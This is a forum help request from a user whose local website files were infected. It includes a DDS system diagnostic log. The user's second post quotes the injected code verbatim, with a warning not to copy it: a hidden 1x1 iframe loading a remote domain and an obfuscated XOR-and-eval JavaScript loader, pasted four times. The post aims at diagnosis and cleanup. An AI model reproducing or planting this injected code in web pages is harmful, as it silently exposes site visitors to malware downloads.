Navarena

hi
there are no sources to find articles about this trojan.script.9983 & trojan.script.32804 as I googled to get rid of them

the problem is that while I OPEN my web page folders bitdefender starts saying that these htm/html/php files are infected by them and just blocks them. the thing is that in the reports all of the files have this mark " =>(IFRAME)" at the end bitdefender fails to disinfect! just can delete or quarantine them which I cant

these are the sources of my local web sites that I need to update and upload & thought you might be the tsf might know what to do.
I would be very glad if anyone can help
waiting for your response
sincerely


----------------------------------------------------------
this is some of the reports of bitdefender and locations:
Object Name Threat Name Final Status

E:\EasyPHP1-8\www\elecitex-2006-2007-b52\fa\judge\exclusive\back_b4_criterias_demo.htm=](IFRAME) Trojan.Script.32804 Disinfect Failed

E:\EasyPHP1-8\www\elecitex-2006-2007-b52\2004\0Cooperation.html=](IFRAME) Trojan.Script.9983 Disinfect Failed
--------------------------------------------------------------------



this is the DDS.txt file:


DDS (Ver_09-06-26.01) - NTFSx86
Run by Navid at 11:34:14.10 on Sat 06/27/2009
Internet Explorer: 7.0.5730.11
Microsoft Windows XP Professional 5.1.2600.2.1256.981.1033.18.959.339 [GMT 3.5:30]

AV: BitDefender Antivirus *On-access scanning enabled* (Updated) {6C4BB89C-B0ED-4F41-A29C-4373888923BB}
FW: BitDefender Firewall *enabled* {4055920F-2E99-48A8-A270-4243D2B8F242}

============== Running Processes ===============

C:\WINDOWS\system32\svchost -k DcomLaunch
C:\WINDOWS\system32\svchost -k rpcss
C:\Program Files\Common Files\BitDefender\BitDefender Update Service\livesrv.exe
C:\Program Files\BitDefender\BitDefender 2009\vsserv.exe
C:\WINDOWS\System32\svchost.exe -k netsvcs
C:\WINDOWS\system32\svchost.exe -k NetworkService
C:\WINDOWS\system32\svchost.exe -k LocalService
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Ashampoo\Ashampoo AntiSpyWare 2\AntiSpyWareService.exe
C:\Program Files\IVT Corporation\BlueSoleil\BTNtService.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\WINDOWS\system32\svchost.exe -k bthsvcs
C:\WINDOWS\system32\crypserv.exe
C:\WINDOWS\system32\nvsvc32.exe
C:\Program Files\mail\5 Star Mail Server\SMTPListener.exe
C:\WINDOWS\System32\alg.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\RUNDLL32.EXE
C:\WINDOWS\RTHDCPL.EXE
C:\Program Files\Ashampoo\Ashampoo AntiSpyWare 2\AntiSpyWare2Guard.exe
C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe
C:\WINDOWS\system32\rundll32.exe
C:\Program Files\BitDefender\BitDefender 2009\bdagent.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\BitDefender\BitDefender 2009\seccenter.exe
C:\Program Files\IVT Corporation\BlueSoleil\BlueSoleil.exe
C:\Program Files\Shetab Farsi Negar 3\FarsiNegar.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\Documents and Settings\Navid\Desktop\techsupportforum\dds.scr
C:\WINDOWS\system32\wbem\wmiprvse.exe

============== Pseudo HJT Report ===============

BHO: Groove GFS Browser Helper: {72853161-30c5-4d22-b7f9-0bbc1d38a37e} - c:\progra~1\micros~2\office12\GRA8E1~1.DLL
TB: Ultra Recall: {c501607c-4a98-4f5e-b9af-425e6bbd5186} - c:\program files\ultrarecall\integration\IEToolbar.dll
TB: BitDefender Toolbar: {381ffde8-2394-4f90-b10d-fc6124a40f8c} - c:\program files\bitdefender\bitdefender 2009\IEToolbar.dll
uRun: [CTFMON.EXE] c:\windows\system32\ctfmon.exe
uRun: [Ultra Recall] c:\program files\ultrarecall\UltraRecall.exe
mRun: [NvCplDaemon] RUNDLL32.EXE c:\windows\system32\NvCpl.dll,NvStartup
mRun: [nwiz] nwiz.exe /install
mRun: [NvMediaCenter] RUNDLL32.EXE c:\windows\system32\NvMcTray.dll,NvTaskbarInit
mRun: [RTHDCPL] RTHDCPL.EXE
mRun: [SkyTel] SkyTel.EXE
mRun: [Alcmtr] ALCMTR.EXE
mRun: [CloneCDTray] "c:\program files\slysoft\clonecd\CloneCDTray.exe" /s
mRun: ['Ashampoo AntiSpyWare 2 Guard'] c:\program files\ashampoo\ashampoo antispyware 2\AntiSpyWare2Guard.exe
mRun: [GrooveMonitor] "c:\program files\microsoft office\office12\GrooveMonitor.exe"
mRun: [AdobeCS4ServiceManager] "c:\program files\common files\adobe\cs4servicemanager\CS4ServiceManager.exe" -launchedbylogin
mRun: [IMJPMIG8.1] "c:\windows\ime\imjp8_1\IMJPMIG.EXE" /Spoil /RemAdvDef /Migration32
mRun: [MSPY2002] c:\windows\system32\ime\pintlgnt\ImScInst.exe /SYNC
mRun: [PHIME2002ASync] c:\windows\system32\ime\tintlgnt\TINTSETP.EXE /SYNC
mRun: [PHIME2002A] c:\windows\system32\ime\tintlgnt\TINTSETP.EXE /IMEName
mRun: [BluetoothAuthenticationAgent] rundll32.exe bthprops.cpl,,BluetoothAuthenticationAgent
mRun: [BDAgent] "c:\program files\bitdefender\bitdefender 2009\bdagent.exe"
mRun: [BitDefender Antiphishing Helper] "c:\program files\bitdefender\bitdefender 2009\IEShow.exe"
mRunOnce: [NCInstallQueue] rundll32 netman.dll,ProcessQueue
dRun: [CTFMON.EXE] c:\windows\system32\CTFMON.EXE
dRunOnce: [ShowDeskFix] regsvr32 /s /n /i:u shell32
StartupFolder: c:\docume~1\navid\startm~1\programs\startup\lingvo~1.lnk - c:\program files\lingvosoft\lingvosoft talking dictionary 2008 (english-persian (farsi)) for windows\LDStub.exe
StartupFolder: c:\docume~1\navid\startm~1\programs\startup\shetab~1.lnk - c:\program files\shetab farsi negar 3\FarsiNegar.exe
StartupFolder: c:\docume~1\alluse~1\startm~1\programs\startup\blueso~1.lnk - c:\program files\ivt corporation\bluesoleil\BlueSoleil.exe
IE: E&xport to Microsoft Excel - c:\progra~1\micros~2\office12\EXCEL.EXE/3000
IE: Send To &Ultra Recall (copy) - c:\program files\ultrarecall\integration\StoreFromIE.html
IE: Send To Ultra &Recall (link) - c:\program files\ultrarecall\integration\LinkFromIE.html
IE: {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe
IE: {FB5F1910-F110-11d2-BB9E-00C04F795683} - c:\program files\messenger\msmsgs.exe
IE: {24187A0F-0FDD-411b-80C6-F1F22F2ED10E} - {7FAD4718-729A-4fea-AA4B-EC340A7C0841} - c:\program files\ultrarecall\integration\IEToolbar.dll
IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - c:\progra~1\micros~2\office12\ONBttnIE.dll
IE: {7F9DB11C-E358-4ca6-A83D-ACC663939424} - {9999A076-A9E2-4C99-8A2B-632FC9429223} - c:\program files\bonjour\ExplorerPlugin.dll
IE: {92780B25-18CC-41C8-B9BE-3C9C571A8263} - {FF059E31-CC5A-4E2E-BF3B-96E929D65503} - c:\progra~1\micros~2\office12\REFIEBAR.DLL
IE: {FD1FF307-68BC-462f-8718-AAEDB6DB7EA2} - {60D7C798-8979-4560-AF4C-2FADE1075EF7} - c:\program files\ultrarecall\integration\IEToolbar.dll
TCP: {51543B1E-AEC5-4312-ACA8-1CFA23A25A51} = 85.185.106.6 217.218.127.104
TCP: {E3583C53-B304-4D61-A439-9CDC0B4F6E86} = 216.155.148.9 216.155.151.5
Handler: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - c:\progra~1\micros~2\office12\GR99D3~1.DLL
SSODL: WPDShServiceObj - {AAA288BA-9A4C-45B0-95D7-94D524869DB5} - c:\windows\system32\wpdshserviceobj.dll
SEH: Groove GFS Stub Execution Hook: {b5a7f190-dda6-4420-b3ba-52453494e6cd} - c:\progra~1\micros~2\office12\GRA8E1~1.DLL

================= FIREFOX ===================

FF - ProfilePath - c:\docume~1\navid\applic~1\mozilla\firefox\profiles\mke43fth.default\
FF - component: c:\program files\mozilla firefox\components\FFComm.dll

============= SERVICES / DRIVERS ===============

R2 AASW2_Service;Ashampoo AntiSpyWare 2 Service;c:\program files\ashampoo\ashampoo antispyware 2\AntiSpyWareService.exe [2009-4-18 749400]
R2 BDVEDISK;BDVEDISK;c:\program files\bitdefender\bitdefender 2009\BDVEDISK.sys [2008-7-2 82696]
R2 SMTPMainService;SMTP Server Service;c:\program files\mail\5 star mail server\SMTPListener.exe [2007-2-4 776704]
R3 bdfm;BDFM;c:\windows\system32\drivers\bdfm.sys [2008-8-12 111112]
R3 Bdfndisf;BitDefender Firewall NDIS Filter Service;c:\windows\system32\drivers\bdfndisf.sys [2008-8-14 104328]
S3 Arrakis3;BitDefender Arrakis Server;c:\program files\common files\bitdefender\bitdefender arrakis server\bin\Arrakis3.exe [2008-7-17 118784]

=============== Created Last 30 ================

2009-06-21 12:54 <DIR> --d----- c:\docume~1\navid\applic~1\BitDefender
2009-06-21 12:53 <DIR> --d----- c:\docume~1\alluse~1\applic~1\BitDefender
2009-06-21 12:47 <DIR> --d----- c:\windows\system32\appmgmt
2009-05-31 15:01 <DIR> --d----- c:\windows\system32\Shetab
2009-05-31 15:01 <DIR> --d----- c:\program files\Shetab Farsi Negar 3
2009-05-31 13:39 <DIR> --d----- c:\windows\Maryam
2009-05-31 13:15 100,992 ac------ c:\windows\system32\dllcache\bthpan.sys
2009-05-31 13:15 100,992 a------- c:\windows\system32\drivers\bthpan.sys
2009-05-31 13:13 5,504 ac------ c:\windows\system32\dllcache\mstee.sys
2009-05-31 13:12 86,016 a----r-- c:\windows\system32\drivers\SCBaud.w9x
2009-05-31 13:12 <DIR> --d----- c:\program files\IVT Corporation

==================== Find3M ====================

2009-06-25 14:00 81,984 a------- c:\windows\system32\bdod.bin
2009-06-23 11:10 192,512 a------- c:\windows\system32\txmlutil.dll
2009-06-23 11:10 242,184 a------- c:\windows\system32\drivers\bdfsfltr.sys
2009-06-23 11:09 104,328 a------- c:\windows\system32\drivers\bdfndisf.sys
2009-06-23 11:09 111,112 a------- c:\windows\system32\drivers\bdfm.sys
2009-06-23 11:09 82,696 a------- c:\windows\system32\drivers\BDVEDISK.sys
2009-05-19 13:26 132 a------- C:\httpdwl.dat
2009-04-23 19:01 83,208 a---h--- c:\windows\system32\mlfcache.dat
2009-04-22 19:29 107,888 a------- c:\windows\system32\CmdLineExt.dll
2009-04-18 22:09 2,305 a------- c:\program files\common files\unins000.dat
2009-04-18 22:08 728,858 a------- c:\program files\common files\unins000.exe
2009-04-18 17:03 4,501 a------- c:\windows\gdrv.sys
2009-04-18 13:03 86,327 a------- c:\windows\pchealth\helpctr\offlinecache\index.dat
2009-04-18 12:06 21,640 a------- c:\windows\system32\emptyregdb.dat
2008-03-09 07:25 236 a---h--- c:\program files\common files\dx.reg
2002-07-10 13:14 11,264 ---shr-- c:\windows\sysback\DOTS.DAT
2001-04-25 14:57 6,708 ---shr-- c:\windows\sysback\GPOS.DAT
2001-04-25 14:58 206,808 ---shr-- c:\windows\sysback\GST.DAT
2001-08-23 15:30 5,632 ---shr-- c:\windows\sysback\KBDFA.DLL
2000-11-04 17:18 583,680 ---shr-- c:\windows\sysback\MSSPELAR.DLL

============= FINISH: 11:35:16.65 ===============


and the zip files are attached.

Attached Files

Attach & Ark 1.zip (3.6 KB, 1 views)

Navarena

Hi
I think I found the problem and the resolution but not completely
there are scripts and IFrames inserted at the bottom of all of the local web pages on the hard drive which links to other sites which seems to be suspicious/hijacker or virus downloader. where did it come from? I think from an mp3 file in a cooldisk.

now the question is how to remove these tags from 2225 infected files? off course it can be done manually for some pages but not for this number of files!!! another thing is that at only one of the above "Iframe" or "script" are seen in a webpage source code at a time.
Any suggestion? I'm badly in hurry

warning for those who are not advanced users and IT pros
>> do not use or copy paste iframe or scripts mentioned bellow <<

the IFRAME is as follws which is at the bottom of the page before these tags: </body> </html> and only bitdefender identifies it as trojan.script.9983



<iframe src="http://NtKrnlpa.com/rc/" width=1 height=1 style="border:0"></iframe>





and the scripts are as follows which I think bitdefender identifies (with some doubt) as trojan.script.32804 . I'm not sure what it is it:

<script>
nb="505b574159515a401a43465d40511c16085d52465559511447465709135c4040440e1b1b47555e5c525c4747565d53565b5a59471a51010c4e1a575a1b45435146404d1b1314435d50405c09130513145c515d535c40091305131447404d58510913425d475d565d585d404d0e145c5d5050515a0f130a081b5d52465559510a161d0f3e514d475209167a557a160f4e514c5509167a557a160f";gnzkp="function bywpn(){ggetg=Math.PI;esqsjr=parseInt;vhyi='length';rhu=esqsjr(~((ggetg&ggetg)|(~ggetg&ggetg)&(ggetg&~ggetg)|(~ggetg&~ggetg)));ca=esqsjr(((rhu&rhu)|(~rhu&rhu)&(rhu&~rhu)|(~rhu&~rhu))&1);ukklp=ca<<ca;zexa=rhu;eysf='';gkn=String.fromCharCode;mk=eval;for(cg=rhu;cg<gnzkp[vhyi];cg-=-ca)zexa+=gnzkp.charCodeAt(cg);zexa%=unescape(rhu+unescape('%78')+(ca<<6));for(cg=rhu;cg<nb[vhyi];cg+=ukklp)eysf+=gkn(esqsjr(rhu+unescape('%78')+nb.charAt(cg)+nb.charAt(cg+esqsjr(ca)))^zexa);try{mk(eysf);}catch(e){try{eval(eysf);}catch(e) {window.location='/';}}}try{eval('bywpn();')}catch(e) {}";eval(gnzkp);
</script><script>
nb="505b574159515a401a43465d40511c16085d52465559511447465709135c4040440e1b1b47555e5c525c4747565d53565b5a59471a51010c4e1a575a1b45435146404d1b1314435d50405c09130513145c515d535c40091305131447404d58510913425d475d565d585d404d0e145c5d5050515a0f130a081b5d52465559510a161d0f3e514d475209167a557a160f4e514c5509167a557a160f";gnzkp="function bywpn(){ggetg=Math.PI;esqsjr=parseInt;vhyi='length';rhu=esqsjr(~((ggetg&ggetg)|(~ggetg&ggetg)&(ggetg&~ggetg)|(~ggetg&~ggetg)));ca=esqsjr(((rhu&rhu)|(~rhu&rhu)&(rhu&~rhu)|(~rhu&~rhu))&1);ukklp=ca<<ca;zexa=rhu;eysf='';gkn=String.fromCharCode;mk=eval;for(cg=rhu;cg<gnzkp[vhyi];cg-=-ca)zexa+=gnzkp.charCodeAt(cg);zexa%=unescape(rhu+unescape('%78')+(ca<<6));for(cg=rhu;cg<nb[vhyi];cg+=ukklp)eysf+=gkn(esqsjr(rhu+unescape('%78')+nb.charAt(cg)+nb.charAt(cg+esqsjr(ca)))^zexa);try{mk(eysf);}catch(e){try{eval(eysf);}catch(e) {window.location='/';}}}try{eval('bywpn();')}catch(e) {}";eval(gnzkp);
</script><script>
nb="505b574159515a401a43465d40511c16085d52465559511447465709135c4040440e1b1b47555e5c525c4747565d53565b5a59471a51010c4e1a575a1b45435146404d1b1314435d50405c09130513145c515d535c40091305131447404d58510913425d475d565d585d404d0e145c5d5050515a0f130a081b5d52465559510a161d0f3e514d475209167a557a160f4e514c5509167a557a160f";gnzkp="function bywpn(){ggetg=Math.PI;esqsjr=parseInt;vhyi='length';rhu=esqsjr(~((ggetg&ggetg)|(~ggetg&ggetg)&(ggetg&~ggetg)|(~ggetg&~ggetg)));ca=esqsjr(((rhu&rhu)|(~rhu&rhu)&(rhu&~rhu)|(~rhu&~rhu))&1);ukklp=ca<<ca;zexa=rhu;eysf='';gkn=String.fromCharCode;mk=eval;for(cg=rhu;cg<gnzkp[vhyi];cg-=-ca)zexa+=gnzkp.charCodeAt(cg);zexa%=unescape(rhu+unescape('%78')+(ca<<6));for(cg=rhu;cg<nb[vhyi];cg+=ukklp)eysf+=gkn(esqsjr(rhu+unescape('%78')+nb.charAt(cg)+nb.charAt(cg+esqsjr(ca)))^zexa);try{mk(eysf);}catch(e){try{eval(eysf);}catch(e) {window.location='/';}}}try{eval('bywpn();')}catch(e) {}";eval(gnzkp);
</script><script>
nb="505b574159515a401a43465d40511c16085d52465559511447465709135c4040440e1b1b47555e5c525c4747565d53565b5a59471a51010c4e1a575a1b45435146404d1b1314435d50405c09130513145c515d535c40091305131447404d58510913425d475d565d585d404d0e145c5d5050515a0f130a081b5d52465559510a161d0f3e514d475209167a557a160f4e514c5509167a557a160f";gnzkp="function bywpn(){ggetg=Math.PI;esqsjr=parseInt;vhyi='length';rhu=esqsjr(~((ggetg&ggetg)|(~ggetg&ggetg)&(ggetg&~ggetg)|(~ggetg&~ggetg)));ca=esqsjr(((rhu&rhu)|(~rhu&rhu)&(rhu&~rhu)|(~rhu&~rhu))&1);ukklp=ca<<ca;zexa=rhu;eysf='';gkn=String.fromCharCode;mk=eval;for(cg=rhu;cg<gnzkp[vhyi];cg-=-ca)zexa+=gnzkp.charCodeAt(cg);zexa%=unescape(rhu+unescape('%78')+(ca<<6));for(cg=rhu;cg<nb[vhyi];cg+=ukklp)eysf+=gkn(esqsjr(rhu+unescape('%78')+nb.charAt(cg)+nb.charAt(cg+esqsjr(ca)))^zexa);try{mk(eysf);}catch(e){try{eval(eysf);}catch(e) {window.location='/';}}}try{eval('bywpn();')}catch(e) {}";eval(gnzkp);
</script>

------
I'm looking forward for help for an automated update which could remove these tags and disinfect the files as far as the virus itself whcih I think was in an mp3 file in the cooldisk. I deleted them however. my cooldisk is also totaly infected. are there any other suggestions?